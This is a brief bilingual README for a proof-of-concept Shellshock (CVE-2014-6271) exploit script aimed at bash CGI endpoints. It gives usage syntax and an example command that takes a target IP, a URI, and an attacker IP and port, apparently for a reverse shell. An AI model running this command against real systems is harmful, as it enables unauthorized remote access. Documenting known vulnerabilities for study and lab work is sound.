
Prueba de concepto para abusar de la vulnerabilidad Shellshock (CVE-2014-6271).
This exploit abuses the Shellshock vulnerability (CVE-2014-6271) existing in bash from version 1.14 to 4.3.
python3 ./exploit.py -t <target-ip:str> -u <uri:str> -a <attacker-ip:str> -p <port:int>
Example:
python3 ./exploit.py -t 10.10.10.15 -u /cgi-bin/vulnerable -a 10.10.10.7 -p 4443
More information about the vulnerability:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-6271